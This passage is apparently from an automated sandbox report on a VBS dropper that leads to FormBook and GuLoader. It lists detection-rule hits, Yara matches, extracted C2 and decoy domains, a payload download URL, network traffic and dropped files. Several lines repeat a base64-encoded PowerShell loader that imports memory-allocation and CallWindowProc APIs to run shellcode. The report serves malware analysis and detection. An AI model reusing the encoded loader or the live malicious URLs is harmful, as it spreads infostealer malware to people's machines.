AgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAG
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAIABSAGgAaQBwADgAIABUAGUAbgBkAGUAcgBlAGUAbwAgA
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5288
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAIABSAGgAaQBwADgAIABUAGUAbgBkAGUAcgBlAGUAbwAgA
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132872558674457953.4676.DefaultAppDomain.powershell

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
      Source: 00000013.00000000.950104658.0000000002A00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://owanlab.com/bin_DziiNe252.bin"}
      Source: New _Inquiry P.O4622.vbsVirustotal: Detection: 8%Perma Link
      Source: New _Inquiry P.O4622.vbsReversingLabs: Detection: 13%
      Source: Yara matchFile source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Source: https://owanlab.com/bin_DziiNe252.binAvira URL Cloud: Label: malware
      Source: unknownHTTPS traffic detected: 157.7.107.166:443 -> 192.168.2.4:49823 version: TLS 1.2
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000013.00000002.1065593654.000000001E9C0000.00000040.00000001.sdmp, ieinstal.exe, 00000013.00000002.1065764939.000000001EADF000.00000040.00000001.sdmp, svchost.exe
      Source: Binary string: svchost.pdb source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp
      Source: Binary string: svchost.pdbUGP source: ieinstal.exe, 00000013.00000002.1060938657.00000000027A0000.00000040.00020000.sdmp, ieinstal.exe, 00000013.00000003.1058405336.0000000002DD4000.00000004.00000001.sdmp

      Networking

      barindex
      Source: C:\Windows\explorer.exeDomain query: www.ordemt.com
      Source: Initial file: BinaryStream.SaveToFile Effortsre1, 2
      Source: Malware configuration extractorURLs: www.usyeslogistics.com/k6sm/
      Source: Malware configuration extractorURLs: https://owanlab.com/bin_DziiNe252.bin
      Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /bin_DziiNe252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: owanlab.comCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: ieinstal.exe, 00000013.00000003.995641802.0000000002D9B000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061538373.0000000002D9B000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.996004923.0000000002D98000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.996129278.0000000002D96000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058453772.0000000002D9B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png0~
      Source: powershell.exe, 0000000D.00000002.1018870776.0000000004D21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0~
      Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000000D.00000003.871107891.0000000007AC6000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester0~
      Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpString found in binary or memory: https://gsmservice.tech/bin_DziiNe252.bin
      Source: powershell.exe, 0000000D.00000002.1024238823.0000000005D81000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpString found in binary or memory: https://owanlab.com/bin_DziiNe252.bin
      Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmpString found in binary or memory: https://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin
      Source: unknownDNS traffic detected: queries for: owanlab.com
      Source: global trafficHTTP traffic detected: GET /bin_DziiNe252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: owanlab.comCache-Control: no-cache
      Source: unknownHTTPS traffic detected: 157.7.107.166:443 -> 192.168.2.4:49823 version: TLS 1.2

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\LQM-8D39\LQMlogrv.iniJump to dropped file
      Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
